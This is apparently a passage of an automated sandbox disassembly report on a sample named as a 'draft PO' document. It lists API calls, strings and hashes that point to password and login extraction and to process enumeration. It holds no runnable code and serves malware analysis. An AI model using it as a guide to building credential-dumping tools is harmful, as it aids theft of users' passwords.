                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                • API String ID: 4054529287-3175352466
                                                                                • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                • API String ID: 3143752011-1996832678
                                                                                • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                • API String ID: 1607361635-601624466
                                                                                • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                • API String ID: 2000436516-3842416460
                                                                                • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                APIs
                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                • String ID:
                                                                                • API String ID: 1043902810-0
                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                • _snwprintf.MSVCRT ref: 0044488A
                                                                                • wcscpy.MSVCRT ref: 004448B4
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                • API String ID: 2899246560-1542517562
                                                                                • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DBCD
                                                                                • memset.MSVCRT ref: 0040DBE9
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                                                • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                • API String ID: 3330709923-517860148
                                                                                • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                APIs
                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                • memset.MSVCRT ref: 0040806A
                                                                                • memset.MSVCRT ref: 0040807F
                                                                                • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                                                • memset.MSVCRT ref: 004081E4
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                • String ID: logins$null
                                                                                • API String ID: 2148543256-2163367763
                                                                                • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                • memset.MSVCRT ref: 004085CF
                                                                                • memset.MSVCRT ref: 004085F1
                                                                                • memset.MSVCRT ref: 00408606
                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                • memset.MSVCRT ref: 0040870E
                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                • String ID: ---
                                                                                • API String ID: 3437578500-2854292027
                                                                                • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041087D
                                                                                • memset.MSVCRT ref: 00410892
                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                • String ID:
                                                                                • API String ID: 1010922700-0
                                                                                • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                APIs
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                • free.MSVCRT ref: 004186C7
                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                • free.MSVCRT ref: 004186E0
                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                • free.MSVCRT ref: 00418716
                                                                                • free.MSVCRT ref: 0041872A
                                                                                • free.MSVCRT ref: 00418749
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free$FullNamePath$malloc$Version
                                                                                • String ID: |A
                                                                                • API String ID: 3356672799-1717621600
                                                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                • API String ID: 2081463915-1959339147
                                                                                • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                • API String ID: 2012295524-70141382
                                                                                • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                • API String ID: 667068680-3953557276
